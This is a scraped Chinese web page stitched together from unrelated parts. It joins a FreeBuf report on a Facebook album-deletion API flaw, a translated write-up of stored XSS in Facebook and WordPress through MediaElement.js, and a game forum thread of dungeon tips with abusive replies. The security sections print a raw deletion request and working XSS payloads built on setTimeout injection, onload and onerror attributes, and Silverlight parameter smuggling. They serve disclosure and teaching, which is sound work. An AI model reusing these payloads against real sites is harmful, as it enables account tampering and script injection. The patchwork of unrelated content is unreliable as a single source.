FB是否都有cf每日一抽技巧漏洞,或者说是漏洞

Facebook用户相册任意删除漏洞 - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
Facebook用户相册任意删除漏洞
共145638人围观
,发现 14 个不明物体
印度安全研究人员Laxman Muthiyah 在Facebook& Graph API上发现一个安全漏洞,攻击者可以利用该漏洞删除任意用户Facebook相册。
FreeBuf科普:什么是Graph API?
Facebook Graph API可以理解为一个可以访问Facebook数据的Web服务。该API提供了对人员,相册,事件等等Facebook对象以及这些对象之间诸如朋友,标签,分享内容等等连接之间的访问。&
当输入一个URL后,会返回一个Json对象 。Graph API是开发人员读写用户数据的主要方式。目前所有的Facebook应用程序使用的都是Graph API。
理论上来说facebook& Graph API需要访问令牌(access token)才能访问或者修改数据,但是研究人员却可利用移动版Facebook生成的访问令牌删除其他Facebook用户相册。
对于攻击者来说删除受害者Facebook账户下的相册非常简单,只需要发送一个基于HTTP的Graph API请求即可完成任意删除操作。
DELETE&/249&HTTP/1.1
Host&:&graph.facebook.com
Content-Length:&245
access_token=&Facebook_for_Android_Access_Token&
响应:-true
Album(249)&got&deleted&:D&so&whatsthe&next&step?&Took&victim's&album&id&and&tried&to&delete&it.&I&was&verycurious&to&see&the&result.
DELETE&/249&HTTP/1.1
Host&:&graph.facebook.com
Content-Length:&245
access_token=&Facebook_for_Android_Access_Token&
结果:-true
OMG&:D&the&album&got&deleted!&So&i&got&the&key&to&delete&all&of&your&Facebookphotos&:P&lol&:D&&
[参考来源,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]
瞎讲。根本不存在facebook这网站。
必须您当前尚未登录。
必须(保密)
FreeBuf小编
关注我们 分享每日精选文章
可以给我们打个分吗?摘要通过使用Open Graph嵌入外部视频,在Facebook Wall上写入存储型XSS。当用户点击播放视频时,XSS将在facebook.com上执行。
我在2017年4月报告了多个FaceBook wall上的存储型XSS。这些存储型XSS漏洞也出现在WordPress中,所以我在发布这篇文章之前等待WordPress进行修补。这些漏洞现已在WordPress上修复!
这些XSS有点复杂,因为它们需要多个步骤,但是每一步本身都很容易理解。
Open Graph协议
当您在Facebook帖子中添加URL时,Facebook将使用 ()显示丰富的内容。以下是关于Facebook如何使用OG在FB帖子中嵌入外部内容的大致流程:
攻击者在FB帖子上发布URL
FB服务器读取URL(服务器端)并读取OG meta标签中提取有关URL内容的信息(例如,内容是带有标题,封面图像,视频编码类型和视频文件URL的视频)
受害者查看带有封面图片和播放按钮FB帖子
当受害者点击播放按钮时,视频会使用从OG元标记中提取的视频信息加载。(XSS将在这里执行)
许多网站也使用OG工作流,包括Twitter和WordPress等。
步骤#2很敏感:服务器端读取用户提供的URL,这通常会导致SSRF。
如果托管网站在敏感网页上使用X-Frame-Options:SAMEORIGIN并允许攻击者在同一子域中注入任意iframe,则会造成潜在的点击劫持漏洞。
FB不容易受???这些问题的影响
有趣的部分在步骤#4:在受害者点击播放按钮后,FB加载视频时。首先,FB会发送一个XHR请求来获取视频类型和视频文件URL,它们都是由攻击者在ogvideo:type(我们称之为ogVideoType)和og:video:secure_url(ogVideoUrl )由攻击者发布的URL的标签。以下是OG元标记的示例:
&!DOCTYPE html&
&meta property=&og:video:type& content=&video/flv&&
&meta property=&og:video:secure_url& content=&https://example.com/video.flv&&
&meta property=&og:video:width& content=&718&&
&meta property=&og:video:height& content=&404&&
&meta property=&og:image& content=&https://example.com/cover.jpg&&
If ogVideoType is “iframe” or “swf player” then FB loads an external iframe and doesn’t handle the playing of the video. Otherwise, FB was using to handle the loading of the video directly on facebook.com. I already reported and
on the Flash component of ME.js on both Facebook and WordPress.
如果ogVideoType是“iframe”或“swf player”,则FB会加载一个外部iframe并且不处理该视频的播放,而是直接使用在facebook.com上处理视频加载。我已经报告并了ME.js的Flash组件在Facebook 和WordPress上的。
1.使用FlashMediaElement.swf造成的存储型XSS
MediaElements.js根据ogVideoType会有多种播放视频的方式。
如果ogVideoType是“video / flv”(flash视频),则Facebook在facebook.com上加载Flash文件FlashMediaElement.swf(使用&embed&标签),并将ogVideoUrl传递到FlashME.swf进行视频播放。FlashME.swf然后将日志信息发送到facebook.com(使用Flash-to-JavaScript)关于“视频播放”或“视频结束”等事件。FlashME.swf正确处理了Flash-to-JavaScript的通信,特别是被正确转义为\以避免XSS。
但是,发送的JavaScript代码是:
setTimeout(&log(&[VIDEO_URL]&)&, 0)
在Javascript中setTimeout与eval类似,它会将字符串转换为指令,使其非常危险
[VIDEO_URL]由攻击者控制,它是ogVideoUrl的值。如果它包含“例如
http://evil.com/video.flv?&[payload]
Flash会将以下指令发送给javascript:
setTimeout(&log(&http://evil.com/video.flv?&payload&)&, 0);
如您所见,“ in video.flv?”payload已正确转义,因此攻击者无法逃离setTimeout函数。
但是,当JavaScript执行setTimeout函数时,它将执行以下JavaScript指令:
log(&http://evil.com/video.flv?&[payload]&)
而这次“不再逃脱,攻击者可以注入XSS!
现在的问题是,Facebook在将ogVideoUrl传递给FlashME.swf之前是否会转义l。
首先,Facebook JavaScript向Facebook服务器发送XHR请求以获取ogVideoType和ogVideoUrl的值。ogVideoUrl的值是正确编码的,但它可以包含任何特殊字符,例如:
https://evil.com?&&&
然后,在发送到Flash之前,ogVideoUrl进行了如下转换:
function absolutizeUrl(ogVideoUrl) {
var tempDiv = document.createElement(&div&);
tempDiv.innerHTML = &&a href=&& + ogVideoUrl.toString().split(&&&).join(&&&) + &&&x&/a&&;
return tempDiv.firstChild.
}flashDiv.innerHTML =&&embed src=&FlashME.swf?videoFile=& + encodeURI(absolutizeUrl(ogVideoUrl )) +&& type=&application/x-shockwave-flash&&&;
absolutizeUrl(ogVideoUrl)的结果 在发送到Flash之前进行了URL编码,但当Flash接收到数据时,它会自动对其进行URL解码,因此我们可以???略encodeURI指令。
absolutizeUrl使用当前的javascript上下文的协议和域(Domain)来将相对URL转换为绝对URL(如果提供了绝对URL,则返回它几乎不变)。这似乎是“哈克”,但它看起来足够安全和简单,因为我们让浏览器做了艰苦的工作。但当存在特殊字符编码时,这并不简单。
当最初分析这段代码时,我使用的是Firefox,因为它有很棒的扩展,比如Hackbar,Tamper Data和Firebug!
在Firefox中,如果你尝试
absolutizeUrl(&http://evil.com/video.flv#&payload&)
http://evil.com/video.flv#%22payload
所以我被难住了,因为在Facebook中,由Flash发送的JavaScript指令会是
setTimeout(&log(&http://evil.com/video.flv?%22payload&)&, 0);
log(&http://evil.com/video.flv?%22[payload]&)
这不是一个XSS。
然后我尝试了Chrome和
absolutizeUrl(&http://evil.com/video.flv#&payload&)
http://evil.com/video.flv#&payload
和 o / YEAH !!!!!
现在Flash发送
setTimeout(&log(&http://evil.com/video.flv?&payload&)&, 0);
到Facebook的JavaScript和哪些将导致
log(&http://evil.com/video.flv?&[payload]&)
所以如果ogVideoUrl设置为
http://evil.com/video.flv#&+alert(document.domain+& XSSed!&)+&
那么Facebook将执行
log(&http://evil.com/video.flv?&+alert(document.domain+& XSSed!&)+&&)
并会显示一个不错的小警告框,说“facebook.com XSSed!” 🙂
这是由于浏览器解析URL时,不同的浏览器在特殊字符编码上有所不同:
Firefox将对URL中出现的任何双引号(“)进行URL编码
Chrome浏览器(最高版本为64)将除了URL 的hash部分(=fragment
)外的双引号(“)进行URL编码。(请注意:在Chrome的最新版本65中,此行为已更改,现在Chrome的行为与Firefox相同,在hash中的双引号(”)也会进行编码)
IE和Edge将不会URL编码在hash部分或者URL 的搜索部分(=query)中的双引号
Safari将不会URL编码在hash部分的双引号(“)
正如你所看到的让浏览器决定如何在JavaScript代码中的URL中进行特殊字符编码并不是很好!
我立即将此漏洞报告给Facebook,他们在第二天回复并告诉我他们修改了Flash文件,以便它不再使用setTimeout,Flash现在会发送
log(&http://evil.com/video.flv?&payload&)
正如你所看到的“正确地转义到”,所里这里不再有XSS。
2.无Flash存储XSS
上面的的XSS需要Flash,所以我检查这里能否有一个不使用Flash的payload。
如果ogVideoType是“video / vimeo”,则会执行以下代码
ogVideoUrl = absolutizeUrl(ogVideoUrl);ogVideoUrl = ogVideoUrl.substr(ogVideoUrl.lastIndexOf(&/&) + 1);playerDiv.innerHTML = &&iframe src=&https://player.vimeo.com/video/& + ogVideoUrl + &?api=1&&&/iframe&&;
正如你可以看到 absolutizeUrl(ogURL)在注入playerDiv.innerHTML之前没有被urlencoded,所以当ogVideoUrl设置为
http://evil.com/#& onload=&alert(document.domain)&
playerDiv.innerHTML则会变为:
&iframe src=&https://player.vimeo.com/video/#& onload=&alert(document.domain)& ?api=1&&&/iframe&
这又是Facebook.com上的XSS!
我在前一个XSS被修复的同一天报道了这一点,Facebook在同一天用如下方法修复了漏洞:
ogVideoUrl = absolutizeUrl(ogVideoUrl);ogVideoUrl = ogVideoUrl.substr(ogVideoUrl.lastIndexOf(&/&) + 1);playerDiv.innerHTML = &&iframe src=&https://player.vimeo.com/video/& + ogVideoUrl.split(&&&).join(&&&) + &?api=1&&&/iframe&&
以下是这个XSS的视频:
您的浏览器不支持video标签
第二天,我发现了另一个易受攻击的点:当ogVideoType是未知的类型,比如“video / nothing”时,Facebook会显示一条包含ogVideoUrl链接的错误消息,如下所示:
errorDiv.innerHTML = &&a href=&& +absolutizeUrl(ogVideoUrl ) + &&&&
所以ogVideoUrl 的payload设置为
https://opnsec.com/#&&&img/src=&xxx&onerror=&alert(document.domain)
errorDiv.innerHTML则会变为:
&a href=&https://opnsec.com/#&&&img src=&xxx& onerror=&alert(document.domain)&&
我把它报告给了Facebook,非常欢乐的是,来自Facebook的白帽子Neil告诉我,他计划在第二天检查这些代码!
哦,还有一件事…
另一种可能的ogVideoType是“silverlight”。 是微软公司的浏览器插件,它能与VBscript交互,就像Flash和JavaScript交互。
在Facebook(silverlightmediaelement.xap)上托管的silverlight文件是这样加载的:
params = [&file=& + ogVideoUrl, &id=playerID&];silverlightDiv.innerHTML =&&object data=&data:application/x-silverlight-2,& type=&application/x-silverlight-2&&&param name=&initParams& value=&& + params.join(&,&).split(&&&).join(&&&) + && /&&/object&&;
silverlightmediaelement.xap然后会发送日志信息到Facebook的JavaScript(这点有点像Flash),但这次它不包含ogVideoUrl,但只有player ID,这是另一个在initParams中发送??Facebook定义的参数。Silverlight会调用javascript函数[id] _init() ,其中[id]是“playerID”。
在Silverlight中,参数不是由 URLs或Flash中的&所分隔,而是通过逗号(,)
如果ogVideoUrl 包含一个逗号( ,)那么在这个逗号后面的每一个东西都将被silverlight视为另一个参数,这意味着使用有效载荷
https://opnsec.com/#,id=alert(document.domain)&
然后silverlight像这样加载:
silverlightDiv.innerHTML =&&object data=&data:application/x-silverlight-2,& type=&application/x-silverlight-2&&&param name=&initParams& value=&file=https://opnsec.com/#,id=alert(document.domain)&,id=playerID& /&&/object&&;
Silverlight将仅考虑id的第一次出现,并将其值设置为
alert(document.domain)&
然后Silverlight将调用以下javascript:
alert(document.domain)&_init()
这意味着再次 XSS!
我在同一天进行了提交,Neal回复说他们将删除所有MediaElement组件,并用一种处理外部视频的新方式替换它!
那么WordPress呢?
所有这些存在问题的代码都不是由Facebook开发的,他们使用了可以将视频嵌入到网页中
库,它是一个流行的(现在依旧是,尤其是因为它们具有支持旧版浏览器的Flash后备功能)开源模块。特别是,WordPress在处理时默认使用这个模块。这些漏洞也存在于WordPress中,并能够在WordPress评论或作者写的WordPress文章中写入存储XSS(在WordPress中,作者角色不允许执行JavaScript)。
我向WordPress报告了漏洞,几个月之前我已经报告过 。他们向MediaElementjs团队通报了这一消息,并告诉我他们正在进行修复。在2018年2月,他们终于发布了与MediaElementjs相关的所有XSS的修复程序。
我学到了很多东西,并且发现这些漏洞非常有趣。我希望你也喜欢它!
以下是一些建议:
Open Graph(以及像json-ld这样的替代品)是在网站上显示丰富的外部内容的好方法,但你应该小心使用(认为SSRF,XSS和Clickjacking)
不要让浏览器在您的JavaScript代码中为您解析URL,每个浏览器都以自己的方式处理它,并且浏览器可以随时更改其行为(如Chrome 64 – & 65)。应该改为使用白名单正则表达式。
现在的自动工具不会检测到使用XHR,DOM突变和外部内容的复杂动态XSS。所以即使是最安全,最有影响力的网站也可能会受到攻击。代码审查和调试是实现这些目标的方法!
不要害怕大的、压缩过、动态的JavaScript源代码。如果您在网站上发现一些潜在的危险功能,您可以放轻松的检查它是如何实现的。
Facebook WhiteHat是一个非常好的漏洞奖励计划!感谢Neal及其团队
本文来源于360安全客,原文地址:
<span class="tipso_style" id="tip-p" data-tipso='
您可以选择一种方式赞助本站
关于本站本站为360用户提供方便快捷的360产品问题解答信息,让我们理智客观的对待互联网信息。本站信息来源于互联网,如有侵权,请留言。后使用快捷导航没有帐号?
查看: 129459|回复: 31
各种FB技巧。。五开的或者喜欢刷FB的玩家的可以看看
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
1.金兜洞,
这个难度算是比较大的
单刷比较爽
需要注意的地方就是,
第二关答题的时候,必须要答6个以上
因为这关有8个怪,一般的队伍都可以杀掉3个,所以还剩5个要跟你请的仙人抵消掉。5:5 你请六个就OK 杀的时候要注意第一回合五个号都扔旗子 第二回合alt+Q就能结束了
再就是打地鼠了
1.jpg (64.1 KB, 下载次数: 87)
00:05 上传
打地鼠的时候 一个人过关比较困难 可以找个朋友帮你 我感觉两个人打是最轻松的 一个人负责前面 一个人负责后面 人多了反而没默契老是打碎油壶
这个也是要打6个以上 跟第二关一样的道理 楼主最多打过9个。
这两关过去就没问题了。
总体来说 这个副本算是最好的吧
175的号来说 单刷可以有500W经验35W钱 修炼果树苗最少也得两个
1个半小时左右
2.jpg (21.61 KB, 下载次数: 75)
00:06 上传
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
2.大闹天宫
这个也可以单刷的
楼主是没办法才想的办法,因为跟别的队伍合作的话 最后的BOSS雷神不好分配 感觉不舒服
这个单刷麻烦一点。
需要一个跟你的队伍一样级别的小号 还有一个100+的小号
第一环很简单,每人做几个单人任务
20个仙桃,每人最多捡三个 所以就需要两个号去帮忙捡
捡完桃子开始杀仙女,
杀仙女的时候 一个队伍最多杀4个
所以这时候要拆成两个队伍 没个队伍3个号去杀
第二关同样。两个队伍去点那些NPC
第三关的时候
3.jpg (62.74 KB, 下载次数: 76)
00:07 上传
有两个小BOSS
这个就用原来的五个号杀,快杀完的时候 其他四个号跑出去 然后队长杀掉
然后再组起那个小号杀第二个
惠安行者和二郎神一个队伍可以直接杀的
下一环点童子 就分成两个队伍找
刷到这里 小号的任务就完成了
五个号直接去杀上古雷神#89
奖励真是超丰富
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
3.天火之殇上部
这个自从策划修改以后楼主去试了一次
四十分钟完事,给了个140的珍珠#89
这个要两个队伍才能刷的。
需要讲的几个技巧,
第一环的时候 领镜子点鬼魂陷阱 这个可以领完镜子直接等失败 因为经过楼主多次试验 无论你成功与否都不给奖励的
4.jpg (42.92 KB, 下载次数: 62)
00:10 上传
最后一环,如果你想要得东西 就扮成女人去里面杀隋炀帝的鬼魂
如果想要经验就在外面杀两个小BOSS
这个FB 40分钟完事,
175的是 200W+
奖励有 兽决 C6 115炼妖石图册 月华露
最好的就是140珍珠
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
这个副本出了很久了 基本都会刷吧?
楼主就讲几个小技巧
第一环的大头领 有几率给修炼果的 所以每次楼主都是抢大头领
5.jpg (85.08 KB, 下载次数: 49)
00:10 上传
特别提示:刷这个副本之前不要变身 因为第二环要变成小沙弥,原有的变身卡效果就会消失
楼主到现在都记不住。。
6.jpg (53.55 KB, 下载次数: 53)
00:10 上传
杀完这个蛇妖, 立刻去门口! 千万别直接点土地公公传到下一环
刚进来门口有个八戒都知道吧
四个蛇妖都杀完以后,八戒会逃跑 跑到化生寺门口
这个是一个隐藏BOSS
跟黑风山那个差不多 小怪都会去保护主 两回合内必须杀死 杀不死没有任何奖励
里面有个变异的蓝色野猪 第一回合要封住,因为他会舍生
这个给修炼果几率很大
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
5.侠士水路
这个只有一个小技巧,
进去有四个迷雾,怎么杀大家应该都知道的
7.jpg (59.87 KB, 下载次数: 45)
00:11 上传
这四个杀完以后 其实不用上去点玄奘
在下面等着就好,他们会自己下来的
以前每次都上去点啊点
这个FB一般吧, 不适合五开刷 因为做动作杀王世充那一关 一个人根本过不去的
奖励有时候给三四个树苗,不过有时候也很坑 就给个珍珠
比较适合大爷们刷
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
6.前生今世2
这个无论对于五开还是普通玩家来说 这都是必刷的FB
想要经验也好 想要积分也好 想要彩果也好 这个FB都可以满足你
这个五开单刷福利比较大
楼主先讲一下单刷
第一环杀马面和牛头的时候 要拖一个
比如说先杀马面, 快杀完的时候 四个队员跑出去 只留队长 然后让队长杀死
四个号组起去杀牛头
第二环,这里需要有个小号
六个号 三人一队 两个队伍杀小乌龟
这个给彩果几率是最大的
第三环 去天宫找千里眼
四个号进第一个选项
完成以后 出来 加上另一个号选第二个选项打定风珠
打完定风珠以后 五个号杀黄风怪,
然后第一次选第一个选项的四个号再杀一遍黄风怪
两次杀完以后
这四个号出去组上FB小号选第三个选项
就可以杀第三遍
楼主175的队伍 杀一次80W+的经验
这个FB第二环和第三环时间够的话可以选择刷两遍
积分多多 单刷的话经验有800多W 钱也很多 给果子几率很大
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
7.齐天大圣的几个小技巧
能抢到哪吒 尽量杀哪吒 哪吒给好东西几率比较大
最后塔顶, 主是不给东西 当然运气好也能给 反正楼主杀了两年了什么都没给过
四个护卫倒是给东西的利率大一点。
其他FB没讲的必要了 都很简单
最后说说五开必刷的FB。
1.乌鸡 钱多简单
2.金兜洞 钱多 东西多
3.水陆大会 积分多多 给的东西有点坑
4.齐天大圣 东西多
5.龙2 这是梦幻给东西最多的一个FB
6.前世今生2 经验多 积分多 东西多
7.天火之殇上部 东西多
8.车迟国 东西多 五开刷比较慢
一个FB进度能刷6个普通的。 你们可以自己琢磨刷哪几个
2.大闹天宫
4.侠士水路
这几天是可以刷的 其他的要么过不去 要么坑
请不要专注我的背影~
主题帖子积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
Lv.4, 积分 1647, 距离下一级还需 353 积分
龙2说实话 这个FB 散人刷比较容易失败
大多都是五开的刷的
第一环太简单 楼主就不说了
第二环 散人刷的话 每人要打两个空白符纸 和 驱鬼符
打完了进去把驱鬼符贴到地板上。切记不可以贴到家具上
要用空白符纸 每个人填两个名字
一共二十个 十八学士和两大将军
百度十八学士就有了
18学士:杜如晦、房玄龄、于志宁、苏世长、姚思廉、薛收、褚亮、陆德明、孔颖达、李玄道、李守素、虞世南、蔡允恭 颜相时、许敬宗、薛元敬、盖文达、苏勗【xu】
2大将:尉迟恭、秦琼
填人名时候 切记不要打上空格 不然不算数还损失一个空白符纸
这个最好是由团长安排每个人填哪两个名字
第三环 切记 要有团队精神,
第三环进去 会在地上洒下宝石和钱
一共是八个宝石 五开的不要漏掉。。
散人的不要因为这些小便宜去耽误全团
第三环进去以后几分钟撒完宝石 就开始出现一个动画 然后我们去点跳过
系统这时会刷出四个坐标
1分钟之内必须找到 同时点才能完成
这就是散人一般不刷的缘故
这个要团长安排人去找四个坐标 不能有任何闪失 不然会失败
找完四个坐标以后 一个队伍去杀6个小怪 一个队伍去杀泾河龙王
6个小怪杀不完的话 龙王是杀不死的无限神佑
所以杀龙王的我们一般叫拖龙王的 要带点蓝药 以防万一
6个小怪杀完了,另一个队伍就可以杀掉龙王了
然后就会刷屏, 五个金丹是必给的 兽决彩果几率很大
总体来说这个FB很不错 奖励很高 就是散人刷太麻烦
请不要专注我的背影~
主题帖子积分
Lv.1, 积分 26, 距离下一级还需 24 积分
Lv.1, 积分 26, 距离下一级还需 24 积分
主题帖子积分
Lv.2, 积分 257, 距离下一级还需 343 积分
Lv.2, 积分 257, 距离下一级还需 343 积分
5开能刷金兜洞.& & 你可以去死了& &&&打地鼠怎么打都过不去.& &连续刷了7次金兜洞.失败7次.& &&&5开刷黑风山还是可以的& &只要把花捡光去扔鬼.&&不够的花杀几个鬼就行.& && && && && && && && && &你5开能刷金兜洞.&&非要逼我揭穿你吗.&&
主题帖子积分
Lv.2, 积分 257, 距离下一级还需 343 积分
Lv.2, 积分 257, 距离下一级还需 343 积分
你难道可以5开刷天火下部.& &&&你要是5开能过天火下部3个童子那里了& &你就可以成神.&&网易都将阻止不了你了
主题帖子积分
Lv.2, 积分 196, 距离下一级还需 404 积分
Lv.2, 积分 196, 距离下一级还需 404 积分
转别人帖子还发你妹啊
主题帖子积分
Lv.2, 积分 283, 距离下一级还需 317 积分
Lv.2, 积分 283, 距离下一级还需 317 积分
老区5开FB没得赚,一个FB得多少东西和钱你懂.老区点卡150等于180-----220W.5开1小时40W点卡,从创建到加完人【时间=?】正式启动副本=12分(现在收到系统消息也得再等1分多才能进,以前进入FB杀一场后才有系统消息)。副本完最后BOSS还要等N长时间副本才关闭【都是时间】。拿乌鸡为例从创建副本到加完自己9个号要10分左右【因为现在梦幻已经不支持几个号同时进入游戏,只要有一个号再人物选择界面点击角色后其他窗口会同时卡住10秒左右】,加完人启动副本12分后才能进入副本开杀.5开玩算上以上时间还没花一样时间开个垃圾号打图得得钱多,乌鸡是所有副本给钱最多的.
再以水陆大会为例,创建到进入副本花费时间【同上】中途天空变黑被策划搞的时间超长,到FB结束要等的时间又是超长。创建副本加人10分等待12分进入黑雾等3分到完BOSS8分,一个副本有30分钟在等待.
5开就要浪费20万点卡钱+开副本12万=32万.
五庄和车池副本等结束的时间就更长了你懂.
老区5开副本不赚钱,除非你人品超棒.
新区副本赚,点卡便宜(⊙_⊙)得钱和老区一样.
头像被屏蔽
主题帖子积分
提示: 作者被禁止或删除 内容自动屏蔽
主题帖子积分
Lv.2, 积分 322, 距离下一级还需 278 积分
Lv.2, 积分 322, 距离下一级还需 278 积分
SB楼主麻烦你去查查前面的帖子 你MB盗别人贴&&居然说杀齐天大圣SB的塔主不给东西 还说你刷了2年 我草你去死吧&&你2年刷了一次差不多 那个给你说的杀塔主不给东西我草&&老子的过几次了{:7_186:}
主题帖子积分
Lv.2, 积分 322, 距离下一级还需 278 积分
Lv.2, 积分 322, 距离下一级还需 278 积分
你一个人 刷黑山&&你刷过去了 我算了 NB&&除非GM吧花全部给你刷在一起差不多&&你MB有捡花有点怪 你一个猪头搞的过来啊{:7_186:}
主题帖子积分
Lv.2, 积分 544, 距离下一级还需 56 积分
Lv.2, 积分 544, 距离下一级还需 56 积分
{:4_86:}{:4_86:}这次又在哪里盗的帖子啊
主题帖子积分
Lv.5, 积分 2864, 距离下一级还需 136 积分
Lv.5, 积分 2864, 距离下一级还需 136 积分
国家工商总局依法查处了一起奥运侵权案件:浙江一内裤生产厂家抢先注册两个商标:男式内裤叫“鸟巢”,女式内裤叫“水立方”,最令奥运组委会气恼的是其广告词是:“同一个地方,同一个梦想”!
主题帖子积分
Lv.1, 积分 38, 距离下一级还需 12 积分
Lv.1, 积分 38, 距离下一级还需 12 积分
侠水路 五开怎么不能刷&&我就是五开刷侠水路 后面防守哪里只要五个号站好位置 而且不能坐坐骑和祥瑞 今本上死两到四个守将&&就能过 只是打完后触发的是隐藏剧情 需要进一个D5的场景 打120珍珠那个是直接打&&110珍珠的那个是需要先杀6个小怪 所以最后需要留30到40分钟杀着两个怪&&不过奖励好啊 我最好的一次5个号给了6个树苗2个如意丹还有珍珠
主题帖子积分
Lv.1, 积分 4, 距离下一级还需 46 积分
Lv.1, 积分 4, 距离下一级还需 46 积分
密兔兔兔兔 发表于
MH。。。DL
四年的风风雨雨
服务项目:高速冲等级。日夜跑环。做师门。急速跑商。跑青龙
垃圾骗子,骗了人就关QQ主页,删好友,走到哪见都能见到你,真行

我要回帖

更多关于 金龟银龟打鱼技巧漏洞 的文章

 

随机推荐